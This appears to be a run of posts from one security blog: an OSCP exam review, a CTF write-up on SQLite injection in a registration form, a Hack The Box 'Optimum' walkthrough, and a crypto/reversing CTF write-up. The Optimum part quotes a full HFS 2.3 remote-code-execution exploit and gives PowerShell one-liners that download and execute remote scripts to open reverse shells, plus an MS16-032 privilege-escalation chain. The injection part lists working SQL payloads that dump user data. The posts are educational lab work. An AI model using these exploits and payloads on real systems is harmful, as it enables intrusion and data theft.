• Gynvael Coldwind, PHP LFI RFC1867 Temporary Files
• Insomniasec LFI With PHPInfo Assistsance

The end of 2017 was intense for me, I attended to do the most complete hands-on penetration testing course, the well renowned Offensive Security’s PWK, and got my Offensive Security Proffesional Certification.

In this review I will be talking about my preparation, my exceptional experience with the PWK Labs, the insane 24 hour exam that leaded me to OSCP certification and of course I will share some important tips.

My background

The idea of doing OSCP appeared during the year of 2017 when I spent the whole year participating of CTF(capture-the-flag) competitions.

Playing for h3x_pr0ph3ts, the Morphus Labs team @ Global Cyberlympics Finals, Netherlands

This same Morphus Labs team developed shellterlabs.com, a awesome plataform to help anyone who wants to join on this CTF world and improve your hacking skills by solving challenges. They have also developed a itinerant platform and are always hosting hacking competitions by the country.

I also had the pleasure of collaborating with this platform and writing the binary exploitation tutorial/challenges.

Playing for p4f @ DC5561 DEFCON Group Brasilia

p4f is the team that I created thinking of improving members hacking skills focusing on CTFs and knowledge sharing. More about p4f here.

CTF versus PWK/OSCP

Different from CTFs that looks like more a game with a specific categorized challenge, the PWK/OSCP are focused on a professional penetration test, an authorized attack on a computer system.

Offsec provides you a corporation environment to identify/exploit weaknesses in order to gain access to the system's features and data which will be used in a way to compromise the entire environment.

I am always interested on sharpening my hacking skills, never moved professionally with pentest and I thought the OSCP would be a good start.

Preparation

With an idea of what would lie ahead, I decided to leave CTF aside and joined hackthebox.eu.

Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It is a collaborative environment that contains several machines that are constantly updated. Some of them simulating real world scenarios.

The complete list of machines I've owned before starting the PWK course are detailed on the screenshot below.

I struggled on each one of them, they had just been released, no published write-ups and I always refused the most to run behind tips. There are some machines that I got stuck than 1 week. This way of thinking was crucial to success in PWK lab.

Differences between HTB and PWK Lab

People always ask about the difficulty of PWK/OSCP versus HTB. It's different.

Along HTB you will find awesome machines much more technically difficult to exploit than machines found on PWK lab. But PWK is focused on a real corporation environment. The network has life!

The flag means nothing. Some machines has dependencies from things that you leaked from a deep packet inspection in another machine inside a internal network that you compromised by orchestrating a client-side attack!

You need to be attentive to the big picture all the time. Trust me, this can be very hard sometimes.

Tools

Offsec provided the course materials and a Kali VMware Image created especially for the course with all the tools that you will theoretically need.

I already have my own custom Kali VM that i've created for my needs, but since Offsec recommended using this for the course, I left my VM aside.

Converting the VMWare image to VirtualBox

I particularly do not like using VMWare, so I converted the VM to a Virtualbox Machine using ovftool.

ovftool "/path/to/pwk-kali-vm.vmx" "/path/to/pwk-kali-vm.ovf"

If you need more details, follow this guide.

VM Customization

As recommended I didn't updated the entire Kali installation, just changed the default Kali Window Manager to XFCE4 and did a few personal customizations.

The outdated Kali packages I updated later individually as needed.

Additional tools

The PWK course forces you to avoid automated tools and focus on doing the things as raw as possible. This is the best way to learn. This way I just have a few tools to recommend.

• Cherrytree - Cherrytree is a hierarchical note taking application, featuring rich text and syntax highlighting.

I think this is the best tool I can recommend here! During every stage of OSCP you will need to take notes, screenshots and stay organized as it will accumulate a lot of information. With all this information well organized, it will be easy to generate the reports at the end.

• SPARTA - Network Infrastructure Penetration Testing: This is a python application which simplifies the scanning on the 1st enumeration phase. This tool was developed by a guy while taking the PWK course and it is a awesome time-saver that gives you a overview of the target.
• terminator - Like tmux, this tool allows you arranging terminals in grids. You can create more terminals by right clicking on one and choosing to split. This is very useful here, Its normal your screen will w/ 7+ running terminals. it vertically or horizontally.
• gliffy - Online diagramming tool alternative to MS Visio. This was very useful to illustrate some details of the network in the report.
• sshuttle - After understanding how dynamic tunneling and port forwarding works with SSH, try this tool. This is where transparent proxy meets VPN meets SSH. It will help you a lot on pivoting.
• enum.py - Scripted local linux wnumeration & privilege escalation checks. The real gem of this script is the recommended privilege escalation exploits given at the conclusion of the script. This is a great starting point for escalation.
• enum.sh - Alternative to above, useful when the machine has no Python installed.
• windows-privesc-check2 - This is standalone executable that runs on Windows systems. It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps.
• shutter - The best linux feature-rich screenshot tool!
• nozzlr - Nozzlr is a multithread bruteforcer, trully modular and script-friendly. The other bruteforce tools are amazing, but the hardcoded parameters make it painful to script over complex tasks. Nozzlr comes to solve this problem. All your task parameters/engine is managed directly in the task template(a python script). This tool was developed by me, feel free to help me w/ this project!

So, these are the additional tools that I used, many others are covered by the PWK course materials.

The PWK Course

Feeling prepared I joined on PWK Labs Network at 16/Dec 2017 and started my journey to OSCP.

Initially I bought only 30 days of course (not recommended, buy 60 days minimum, I will explain why), so I tried to save as much time as possible in the materials and exercises.

This way I finished my studies in just 2 days, focusing only on the points I was not yet familiar with.

The course materials is a good start to build your cheat-sheet, take note of every command because you will need to reuse it later a lot of times.

The course also covers a Windows/Linux buffer overflow, this is one of the most technical part and it scares a lot of people. I decided to leave it aside and study when I had finished the Labs, so I would get this subject on the exam with fresh memory and this proved to be a good decision.

PWK Network

The network is awesome, as I mentioned before, this simulates a corporation network with life.

Offsec gives to you a VPN access to the Public Network and your task is to hack all the things! 50+ hosts, 1 public network and 3 internal. A wide variety of systems.

The techniques/exploits used to compromise each target rarely recur. Some machines are not directly exploitable and you need to lead a client-side attack or use leaked data from another network to compromise this targets.

So, in 30 days I compromised about 35 machines. Knowing that I would not have enough time to finish the labs I decided to extend my access for +30 days.

After spending almost 2 months fully dedicated to OSCP, I finally compromised the entire lab(50+ machines) and I still have 7 days to review some points and already prepare my PWK Lab Report.

Offsec provides you some templates that you can use to write your report. The PWK Labs Report gives you 5 additional points.

Recommendations regarding PWK Labs

• The forum is very useful to learn and share alternative methods of compromising the same target. Avoid using this to get tips! Use it only when you are really stuck for days! Trust me, the rabbit roles teaches much more than a direct tip.
• The lab was created in 2014 and updated recently but some machines are vulnerable to recent exploits that take you directly to administrator access w/ a single skiddie shot, skiping all over indented way. It's not a speedrun! Try to find the intended way to compromise each target.
• Don't be scared about that big four technically hardest machines that everyone talks about. You will face much worse challenges in the lab, simple things that end in a beautiful facepalm.

The brutal 24 hour exam timeline

13:00 - Feeling very confident, I received the email containing details for VPN access to the Exam network including a debugging VM. In order to pass I would need score 70+ points.

I properly enumerated all the targets and already outlined a strategy. I decided to start with the machine that was technically more difficult and also gave a good amount of points.

15:00 - Thanks to my studies, mastering the technique, I owned this machine so fast. This has already made me feel good to continue. So I left the lowest scoring machine (10 pts) for the final and went on to deeply enumerate the other 3 machines.

22:00 - Things were starting to get complicated, this task took me a lot of hours and finally I popped a low-privilege shell on a 20 pts machine and got a very restricted access to another 20 pts one.

01:30 - Finally owned the 20 pts machine and quickly owned the 10 pts machine.

Now with 55 pts, knowing that I would only need to finish one of the two remaining machines, one of which I already had low-priv access, very mentally exhausted I decided to take a nap.

06:00 - Of course I slept very poorly, woke up about 6 a.m. and I decided to continue my journey.

10:00 - After entering the deepest and darkest rabbit hole ever I finally got administrator access on that machine totaling 75 pts, enough to pass.

12:45 - Now with a fresh head, without pressure, leaving only one machine to complete the 100 pts I got a low-priv access on the last one, then my suddenly VPN dropped! Time is over! I did not even have time to dump the user level proof.

But okay, feeling happy that I had passed the exam I went back to sleep and I woke up later.

18:00 - After a good rest, very focused, very careful not to let anything behind, following all the rules, I wrote the Exam Report.

I also sent my entire raw pentest data that I created w/ Cherrytree. It's not necessary but it was proof that I fought for every target along PWK Labs and Exam.

And finally, 24 hours after publishing my report I received the confirmation through the well desired email, all my hard work paid off.

I will miss the OSCP labs access, but for sure I will continue on the forum helping everyone who need nudges on PWK Labs and learning even more through alternative solutions.

Conclusions

Different from other certifications that is all about theory and multiple choice questions, OSCP/PWK is a trully hands-on certification that puts you to the test in every possible way.

The admins are very professional, they have a protocol for everything. And they build an awesome community behind.

I strongly recommend it for everyone who wants to start in this area and also for those who already work with.

Regardless of your skills, be Humble, you will Try harder.

Resources

• Shellterlabs : Writing exploits - https://shellterlabs.com/en/training/get-started/writing-exploits/
• Shellter Hacking Express challenges - https://shellterlabs.com/en/contests/challenges/?event=10
• Windows BOF PCMan FTP - http://netsec.ws/?p=180
• Hack the box - http://hackthebox.eu
• Nishang : PowerShell scripts - https://github.com/samratashok/nishang
• Windows Privilege Escalation Fundamentals - http://www.fuzzysecurity.com/tutorials/16.html
• Basic Linux Privilege Escalation - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
• Pentest Tips and Tricks - https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/
• Nmap cheat sheet - https://highon.coffee/blog/nmap-cheat-sheet/
• SANS Institute : Port Knocking basics - https://www.sans.org/reading-room/whitepapers/sysadmin/port-knocking-basics-1634
• Teck_K2 OSCP review - https://teckk2.github.io/category/OSCP.html
• m4lv0id OSCP review - https://medium.com/@m4lv0id/and-i-did-oscp-589babbfea19
• The definitive hacking playlist - https://soundcloud.com/intrd/sets/hacking

I'm seeing a lot of people asking for write-up of this challenge, so here it is!

TLDR It's about a simple SQLite injection, and it needs to be done manually. Your sqlmap will not work with default settings, maybe w/ some custom parameters and/or a tamper script, but trust-me this is not necessary.

Enumeration

The most important step of any pentest activity is the recon. In this case we have a login form of a web application, so I started by enumerating directories, scripts, SSL certificate details, system features.

Directories and files/scripts

C=200    "index.html"
C=200    "register.php"
C=200    "login.php"
C=403    ".git"
C=403    ".git/HEAD"  << This could be interesting, but we do not have access ..
C=403    ".svn"
C=403    ".svn/entries"

SSL certificate details

E = shx@16.com << Good, we have an email, maybe the email from the system administrator?
CN = "SHX#16"
OU = SHX 16
O = SHX
L = FOR
ST = CE
C = BR

Browsing the system features I noticed that it does not accepts duplicated records for username and email

This is what happens when we try to register an existing username or email

Looking at the raw response I found a hidden DIV showing us some important debug information:

UNIQUE constraint failed: USERS.MAIL  
...
UNIQUE constraint failed: USERS.USERNAME  

So, we can extract 3 important information from this errors:

• Table name: USERS
• Username column name: USERNAME
• Email column name: MAIL

We also can confirm that already exists an user registered w/ that leaked email w/ this payload:

first_name=test&last_name=test&user_name=tesst&pass_word=test&email=SHX@16.com

With this we can bruteforce usernames and emails, but we want more!

Attack vector

After fuzzing the registration form fields w/ some illegal characters I got a SQL sintax error sending ' at mail field:

first_name=test&last_name=test&user_name=tesst&pass_word=test&email='

ERROR: SQLSTATE[HY000]: General error: 1 near "test": syntax error  

Perfect, now we need to find a way to take control of this INSERT query.

So, the first step is try to figure out the number and positions of columns of the current INSERT query.

email=xx','xxx','a4');#

ERROR: SQLSTATE[HY000]: General error: 1 3 values for 4 columns  

So, we have 4 columns, if we send 4 columns it register a new user w/ our query data:

email=xxx','xxx','a4','11');#

And now we can figure out the INSERT columns order: email, name, username, password.

Data leaking

Now let's try to insert a sql subquery in place of parameter name to leak some database information. The first idea come in mind is to try get version of this SQL database..

email=xxx',(select version()),'a4','11');#

..injection works, but the INSERT fails, this SQL database has no version() function..

ERROR: SQLSTATE[HY000]: General error: 1 no such function: version  

Why? because it's not a MySQL database, maybe a SQLite? let's test..

email=xxx',(SELECT tbl_name FROM sqlite_master),'a4','11');#

Perfect, it printed the current table name and SQLite confirmed!

Now we have all the pieces to mount our query searching for the flag.

Counting all entries from USERS

email=xxxxX',(SELECT count(*) FROM USERS),'a10','11');#

Welcome My Friend
Here your infos:
name: 6
mail: xxxxX
username: a10
password: 11

Dumping the MAIL from first USERS entry

email=xxxxXX',(SELECT MAIL FROM USERS LIMIT 0, 1),'a11','11');#

Welcome My Friend
Here your infos:
name: SHX@16.com
mail: xxxxXX
username: a11
password: 11

Dumping the ID from first USERS entry

email=xxxxXX',(SELECT ID FROM USERS LIMIT 0, 1),'a11','11');#

Welcome My Friend
Here your infos:
name: 31337
mail: xxxxXXXX
username: a13
password: 11

Dumping the USERNAME from USERS where ID is equal to 31337

email=xxxxXXXXX',(SELECT USERNAME FROM USERS WHERE ID=31337),'a14','11');#

Welcome My Friend
Here your infos:
name: flag
mail: xxxxXXXXX
username: a14
password: 11

Awesome, and finally dumping the PASSWORD from the user where ID=31337

Done!
Thanks shellterlabs.com

References

• SQL Injection in INSERT Query - http://amolnaik4.blogspot.com.br/2012/02/sql-injection-in-insert-query.html
• SQLite Injection - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/SQLite%20Injection.md

I'm starting a series of write-ups about the HTB retired machines. I have owned 33 machines until now, applying the most diverse techniques, some machines are so well elaborated that they are true masterpieces.

All this information can not be lost and I intend to share with you in detail what I have done to pwn the "best machines".

Enumeration

A basic port-scan and osscan w/ nmap revealed this:

PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /

Running (JUST GUESSING): Microsoft Windows 2012|7|8|Phone|2008|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (90%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows 7 (85%)

A Windows box running a HttpFileServer httpd 2.3 on port 80

Attack vector

There is a known RCE vulnerability on this service

#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#           It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
#           It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. 

#Usage : python Exploit.py <Target IP address> <Target Port Number>

#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!


import urllib2  
import sys

try:  
    def script_create():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")

    def execute_script():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")

    def nc_run():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")

    ip_addr = "10.10.15.169" #local IP address
    local_port = "3001" # Local Port number
    vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
    save= "save|" + vbs
    vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
    exe= "exec|"+vbs2
    vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
    exe1= "exec|"+vbs3
    script_create()
    execute_script()
    nc_run()
except:  
    print """[.]Something went wrong..!
    Usage is :[.] python exploit.py <Target IP address>  <Target Port Number>
    Don't forgot to change the Local IP address and Port number on the script"""

Analyzing xpl source code, we can see that it uses a null byte injection %00 on parameter search to escape the filter of the forbidden characters allowing us to script over HFS Language without restriction.

http://10.10.10.8/?search=%00{YOUR_HFS_SCRIPT_HERE}  

With the RCE it runs a VBS script locally that downloads your served nc.exe and spawn a reverse shell to you.

Ok, leave the script aside and let's do it all manually.

Null byte injection

We can confirm the injection on HFS Lang is working by sending a break command and analyzing the response..

Without null byte

With null byte

...using break it returns only 1802 bytes halting the script.

Remote code execution

This HFS lang allow us to execute commands on server-side using the exec

..to confirm the RCE we can try to send a ICMP Ping back to us. You can use tcpdump to filter only ICMP packets..

Attention

• The system ENV variables are working, this is why i'm using full path C:\Windows\system32\ping.exe, and this path will vary on Windows versions.
• Sometimes there's a firewall blocking ICMP packets. A good idea to contour this is to test reverse connection on TCP port 443 before discard this idea.

Reverse shell

Now we need a shell on this machine.. It's a windows machine, and we have Powershell enabled since Win2k8+Win7, so let's google for a good Powershell Reverse shell.

Nikhil SamratAshok Mittal wrote an awesome article about powershell shells and provided a collection of snippets here https://github.com/samratashok/nishang

Take his PowerShellTcp.ps1 and serve it locally w/ your Python SimpleHTTPServer.

Now we need to find a way to Download and Execute this Powershell script.

From a 32-bit PowerShell session, to launch a 64-bit PowerShell session, use:
C:\Windows\SysNative\WindowsPowerShell\v1.0\PowerShell.exe

From a 64-bit PowerShell session, to launch a 32-bit PowerShell session, use:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe

Source: http://www.madwithpowershell.com/2015/06/64-bit-vs-32-bit-powershell.html

To test if Powershell and HTTP reverse connections is working I use this one-liner, it emulates a *nix WGET

Using Win32 paths didn't get any response, but:

%00{.exec|+C:\WINDOWS\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy unrestricted -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.15.169:3001/test', 'C:\windows\temp\test').}

Awesome, we have a Winx64 machine w/ Powershell downloading our scripts.

Now launch your local nc listener and use this snippet to load the remote .ps1 in memory and execute.

%00{.exec|C:\WINDOWS\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy unrestricted -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.169 -Port 3002.}

Note, I passed my IP/Port as args on command-line..

Finally we got a kostas user shell and our user flag.

Privilege escalation

Now to priv-esc start enumerating all the information you can about the machine..

• System version
• Hot fixes applied
• Users, grops, permissions
• Running processes
• Scheduled tasks
• Routes, firewall state
• Sysprep and Unattended config files..
• Config files (cfg, config, ini)

..any information that might help you in priv-esc.

From systeminfo I some interesting machine information

Host Name:                 OPTIMUM  
OS Name:                   Microsoft Windows Server 2012 R2 Standard  
OS Version:                6.3.9600 N/A Build 9600  
OS Manufacturer:           Microsoft Corporation  
OS Configuration:          Standalone Server  
...
System Type:               x64-based PC  
...
Windows Directory:         C:\Windows  
System Directory:          C:\Windows\system32  
...
Domain:                    HTB  
Logon Server:              \\OPTIMUM  
Hotfix(s):                 31 Hotfix(s) Installed.  
                           [01]: KB2959936
                           [02]: KB2896496
                           [03]: KB2919355
                           [04]: KB2920189
                           [05]: KB2928120
                           [06]: KB2931358
                           [07]: KB2931366
                           [08]: KB2933826
                           [09]: KB2938772
                           [10]: KB2949621
                           [11]: KB2954879
                           [12]: KB2958262
                           [13]: KB2958263
                           [14]: KB2961072
                           [15]: KB2965500
                           [16]: KB2966407
                           [17]: KB2967917
                           [18]: KB2971203
                           [19]: KB2971850
                           [20]: KB2973351
                           [21]: KB2973448
                           [22]: KB2975061
                           [23]: KB2976627
                           [24]: KB2977629
                           [25]: KB2981580
                           [26]: KB2987107
                           [27]: KB2989647
                           [28]: KB2998527
                           [29]: KB3000850
                           [30]: KB3003057
                           [31]: KB3014442

This is a Windows Server 2012 R2 box w/ some hot fixes applied, using wmic you can list detailed information of each one:

wmic qfe get Caption,Description,HotFixID,InstalledOn

Caption                                     Description      HotFixID   InstalledOn  
                                            Update           KB2959936  11/22/2014   
http://support.microsoft.com/?kbid=2896496  Update           KB2896496  11/22/2014  
http://support.microsoft.com/?kbid=2919355  Update           KB2919355  11/22/2014  
http://support.microsoft.com/?kbid=2920189  Security Update  KB2920189  11/22/2014  

...

Combinating w/ exploit.db you can try to figure out witch one is not applied to a known vulnerability that allows priv-esc.

But it's painful. Why not use an automated tool to do this work?

Windows exploit suggester

This is a Python script that uses your systeminfo dump to check missing hot fixes and list the possible vulnerabilities.

• Download here Windows-Exploit-Suggester
• Update w/ python windows-exploit-suggester.py --update
• Feed it w/ your systeminfo dump python windows-exploit-suggester.py --database 2017-11-15-mssb.xls --systeminfo ../systeminfo.txt

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 32 hotfix(es) against the 266 potential bulletins(s) with a database of 137 known exploits
[*] there are now 246 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2012 R2 64-bit'
...
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important
[*]   https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF
[*]   https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC
[*]   https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC
[*]   https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)

So, it listed a several possible exploits for priv-esc, but the MS16-032 caught my attention because it is exactly for Windows 2012 R2 64-bit, has a well known Powershell PoC also a Metasploit-framework module.

You can see this exploit in action here..

It is designed to execute locally and spawns a new cmd.exe w/ NT Authority\SYSTEM privilege. We do not have visual access to this machine and we will not be able to access this new cmd.exe.

Ok, we can enable a Remote Desktop or VLC connection to do this, but it sucks!

The solution I found was to modify the script to accept commands in the arguments and execute anything as NT Authority\SYSTEM instead of that new cmd.exe.

Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command YOUR_COMMAND_HERE"  

Download ms16_032_intrd_mod.ps1 here: https://gist.github.com/intrd/6dda33f61dca560e6996d01c62203374

Using our user shell we can invoke the MS16-032 exploit and pass our reverse-shell one-liner as argument to get our NT Authority\SYSTEM spawned on another nc listener/port..

IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/ms16_032_intrd_mod.ps1');Invoke-MS16-032 "-NoProfile -ExecutionPolicy Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.169 -Port 3003"  

Final note

I saw a lot of people suffering to get NT Authority\SYSTEM on this box @ hackthebox.eu, and the main reason is because it is dependent on having thread handle available on machine.

The people downloaded the exploit without understanding/modifying, run and keep spawning the local system-shell they did not have access N times until the thread handles were running out and the exploit did not work anymore.

The obvious recommendation in this case is to test your exploit locally in an environment you control. When it works reset the remote machine and run your exploit.

References

• Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) - https://www.exploit-db.com/exploits/39161/
• HFS: scripting commands - http://www.rejetto.com/wiki/index.php?title=HFS:scriptingcommands
• Null Byte Injection - http://projects.webappsec.org/w/page/13246949/Null%20Byte%20Injection
• Powershell System Paths - http://www.madwithpowershell.com/2015/06/64-bit-vs-32-bit-powershell.html
• Week of PowerShell Shells Day 1 - http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
• Samratashok Powershell reverse shells - https://github.com/samratashok/nishang/tree/master/Shells
• Windows exploit suggester - https://github.com/GDSSecurity/Windows-Exploit-Suggester
• Security Update for Secondary Logon to Address Elevation of Privilege (3143141) - https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2016/ms16-032
• Exploiting a Leaked Thread Handle - https://googleprojectzero.blogspot.com.br/2016/03/exploiting-leaked-thread-handle.html
• Win7-Win10 & 2k8-2k12 <== 32/64bit privilege escalation (MS16-032 exploit modded) - command argv + reverse shell - https://gist.github.com/intrd/6dda33f61dca560e6996d01c62203374
• Invoke-PowerShellTcp.ps1 - https://gist.github.com/intrd/d5086206bdef0ba1d7776c5325547626
• powershell_wget_oneliner.ps1 - https://gist.github.com/intrd/585978b815b89dedd774da1b6b8a1535
• powershell_download_exec.ps1 -https://gist.github.com/intrd/feec7171aa7d172742b330f1f77f3edf

There's a poem..

I'm not a good writer, and Shakespeare is better than me
But writing a little poem, oh gosh, how hard can it be?

Let's go, let's go, let's go, let's write a rhyme for crypto
Don't know, don't know, don't know, ok let's just use TIPTOE

Ok, ok, ok, so what's this CHALLENGE about?
Don't know a word to say and time has just ran out

Those RANDOM numbers, ya know, they always have a SEED
To find this FLAG, ya know, I guess that's what you need

Oh my gosh! Oh my gosh! I have to admit
The CERTIFICATE we've hit, oh man it seems legit!

Oh my gosh! Oh my gosh! Did they change it just a bit?
The ARRAY you just have found, what you gonna do with it?

I know, I know, you're tired of all this sh...ame
Calm down, calm down, the FLAG looks like a name

I know, I know, you're tired of all this game
Calm down, calm down, the flag will bring you FAME!

The poem have some highlighted words...

TIPTOE
CHALLENGE
RANDOM
SEED
FLAG
CERTIFICATE
ARRAY
FLAG
FAME

Also there's a file called certificate.txt

This certificate, looks a base64.. we tried to decode and it worked, resulted in a Windows PE executable

Renamed it to decode1.exe and runned on a Windows VM..

.. it shows a encrypted text <=$uj{-3azseg?&(j2 <1<j7=6{,7-9$;|j'*"=?1z9) and keeps expecting for some input.

Analyzing it we got some interesting hard-coded strings and we can already have an idea that this is a type of crackme challenge..

Also got this hint..

What most caught our attention was this string Ok, enter it:, if we wrongly answer to the first question the program closes and this string is not displayed.

Maybe it was expecting for some key.. so, we had to figure out the correct answer for the question and possibly get into this input to enter something to see what happen.

Instead of trying to find the first correct command we patched the binary modifying this jnz

..to jz to bypass the verification of the question and go directly to Ok, enter it:, and it works, now we can test our keys.

Before we start thinking about bruteforce we were able to understand exactly what the encryption algorithm was doing..

Its a simple stream cipher, XOR each byte of encrypted string w/ each byte of the key.

Using the key test we got this result..

Emulating it on python using the 1st 4 bytes of ciphertext..

#!/usr/bin/python
## Keygen solution to crypto800-poem @ DC5561 CTF 2017  
# solved by intrd & r00tc0d3r - p4f team

string = [0x3c,0x3d,0x24,0x24] # 1st 4 bytes of encrypted text: <=$uj{-3azseg?&(j2 <1<j7=6{,7-9$;|j'*"=?1z9)  
xor_key = [0x74,0x65,0x73,0x74] # 4 byte key: test

str=""  
for i in range(0,4):  
    i=string[i]^xor_key[i]
    str += chr(i)
print(str)  

..and running we can see the 1st 4 bytes of the result was the same HXWP returned by the binary! Success!

Ok, but how to find the correct key? So, why not try that poem highlighted words?

Bingo! the first key we tried TIPT decoded to http..

So, we updated the script to decode the remaining bytes repeating the key along the way.. TIPTOETIPTOETIPTOETIPTOETIPTOETIPTOETIPTOETIP, 45 bytes same length of ciphertext.

# #!/usr/bin/python
# ## crypto800-poem decoder @ DC5561 CTF 2017  
# # by intrd & r00tc0d3r - p4f team

def sxor(s1,s2):  
    return ''.join(chr(ord(a) ^ ord(b)) for a,b in zip(s1,s2))

key = "TIPTOE"  
print repr(sxor(key*20, "<=$$uj{-3azseg?&(j2 <1<j7=6{,7-9$;|j'*\"=?1z9)"))  

..the result can't be better!

A URL w/ some python scrypt!
http://dc5561.org/files/ctf/crypto3/script.py

#!/usr/bin/env python
"""This is just a simple yet challening Python script.
   Not finished yet, though...
   Use the hints you have so far to finish it and get your FLAG!"""

import sys  
import random

def my_rand(seed):  
    r = random.Random()
    # TODO - the seed needs to come from the "user"
    # temporarly I'll just leave 'SEED' here. Hope someone fixes this...
    r.seed('SEED')
    return round(r.random() * 10)

def char_sub(str_array, position):  
    var = str_array[int(position)]
    var = var.replace("a", "@")
    var = var.replace("e", "3")
    var = var.replace("i", "1")
    var = var.replace("o", "0")
    return var

def main(argv):  
    mixed_array = [".", "phrase:", "Best", "William.", "be?", "To", "not", "or", "to", "be", " - SHAKESPEARE, " ]
    # TODO - I'm lazy, so this function is not ready yet...
    # organize_array()
    # TODO - organized_array should be different from the mixed_array
    organized_array = mixed_array
    # Get the right word
    index = my_rand(argv[1])
    print "Index: ", int(index)
    print "This is the flag:", char_sub(organized_array, index)

if __name__ == "__main__":  
    main(sys.argv)

So, analyzing the code, it uses a predefined random() seed to select a random string from a mixed_array and replace a random byte of this string w/ a l33t speak character.

Also there's a function we need to code to organize the array..

..but i'm lazy too and dit it by hand

So, now we need the correct random seed to get the correct flag. Back to the poem, there are some lines that mention elements of this python script.

We decided to test the rest of the highlighted words and the seed ARRAY was the only one that returned me something that looked like a flag..

Nice! the poem says Calm down, calm down, the FLAG looks like a name, this can be the flag (remembering that we have limited attempts to submit the flag).

And done! every challenge solved p4f team 1st place! very proud of our team..

Thanks to DC5561 DEFCON Group Brasilia for hosting this CTF.

References

• Stream Cipher - https://en.wikipedia.org/wiki/Stream_cipher
• Patching the binary w/ radare2 and writing a keygen in Python - http://dann.com.br/shx5-rev200-lil_arm/

Our inside crew was able to set up a sniffer and intercept some comms, but we haven't had time to analyze it yet. Critical information is needed! Submit the ver, seccoms and cry t0k3n. Download PCAP from http://bit.ly/wgzPacMan -- If you've already downloaded wgzPacMan, no need to download it again.

